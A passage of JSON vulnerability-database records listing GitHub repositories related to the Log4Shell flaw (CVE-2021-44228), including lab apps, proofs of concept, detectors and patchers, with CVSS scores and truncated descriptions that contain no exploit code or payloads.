"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T19:46:05", "id": "547FC254-3B26-59EC-AF4D-E5954678AC3D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-22T23:15:39", "description": "# Log4J (CVE-2021-44...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T21:52:53", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-22T16:23:31", "id": "0D4B651A-4424-55FE-B496-1BB733DE7EE2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-18T02:14:17", "description": "# JndiLookup\nSome tool to help analyzing Apache Log4j 2 CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T14:22:34", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-18T02:12:49", "id": "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T02:10:46", "description": "# \u2615 ITF-log4shell-vulnapp\n\nlog4j (CVE-2021-44228) Spring-boot we...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T08:21:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T07:12:38", "id": "75876A50-BD9B-5991-9E42-7A343A97C890", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-08T21:09:00", "description": "# log4shell-rmi-poc\nA Proof of Concept of the Log4j vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-19T17:53:31", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-08T15:07:19", "id": "61AC9232-A772-5D63-9DFC-BFE4976418C7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-23T06:53:54", "description": "<img src=\"logo.png\" width=\"400\">\n\n# \ud83d\udd0d Log4JShell Bytecode Detect...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T11:28:34", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-23T02:10:51", "id": "553C3CC1-0126-5554-8BE0-5F577271EBF9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T16:31:40", "description": "# mc-log4j-patcher\n\nReplaces old (vulnerable - CVE-2021-44228) L...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T19:25:31", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T10:17:28", "id": "6F10C51B-BF15-522B-B1CB-BA95361D556E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T14:07:27", "description": "# Exploit the Log4j / CVE-2021-44228 vulnerability (PoC soon...)...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T20:12:07", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T22:55:10", "id": "817FB04E-AFFE-567B-8A2C-64C0A8923734", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:05", "description": "# Sample Log4j2 vulnerable application (CVE-2021-44228) \n# Versi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-12T13:00:38", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T04:00:49", "id": "D813949A-183D-55ED-AF64-B130B8F95A56", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-05T17:12:07", "description": "# Log4Shell docker lab for CVE-2021-44228\n\n## The components\nThi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T19:30:35", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T14:55:14", "id": "B32ED3B3-2054-5776-B952-907BE2CBEED6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-07T14:15:08", "description": "# Ansible role - log4shell\n[![Maintainer](https://img.shields.io...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T16:41:31", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-07T13:20:04", "id": "26FD2B5F-2952-5624-8CB5-3ECD4480DA87", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-03T14:21:10", "description": "# CVE-2021-44228 checker\n\nThis is the repository for checking fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T17:24:47", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-03T11:28:03", "id": "1CC6B535-3451-5066-8C2E-94551FEC545E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T12:23:56", "description": "# log4j-detect\n\n<h4 align=\"center\">Simple Python 3 script to det...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T08:48:59", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T12:17:01", "id": "FB593988-2CFC-5828-8229-9274AC7B0F86", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T20:10:08", "description": "# Log4j Updater\n\nWith the inevitable need to update the famous J...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T04:08:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T17:25:55", "id": "4288177C-C609-5D55-A845-D6785929AB4D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:17:41", "description": "# CVE-2021-44228\nMass recognition tool for CVE-2021-44228\n\n## ne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T13:25:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T13:37:39", "id": "D2602292-4969-564A-915E-2EFC6661FA35", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:11:30", "description": "# Cloud One - Workload Security Log4Shell\nThis repo contains a q...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T03:20:25", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T17:07:45", "id": "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T11:08:05", "description": "# Apache Log4j Zero Day aka Log4Shell aka CVE-2021-44228\n\n<!-- v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T10:34:06", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T10:34:18", "id": "F4C136DE-892B-5921-8475-E30BD548DDBB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T03:41:28", "description": "# CVE-2021-44228 \u2013 Log4j RCE Unauthenticated\n\n## About\n\nThis is ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T02:18:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T03:23:09", "id": "945E86E8-E114-5F51-991C-13742C6EF49E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-26T13:53:22", "description": "# f5-waf-enforce-sigs-CVE-2021-44228\nThis enforces signatures fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T21:59:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T22:21:51", "id": "DA01F84A-9B1D-5337-A465-2A9AB088C056", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:13:55", "description": "# aws-log4j-mitigations\n\nMitigations ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T08:01:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T08:05:42", "id": "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-22T23:09:03", "description": "# IMPORTANT DISCLAIMER\n\n**THIS SCRIPT CAN LAND YOU IN SERIOUS TR...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": 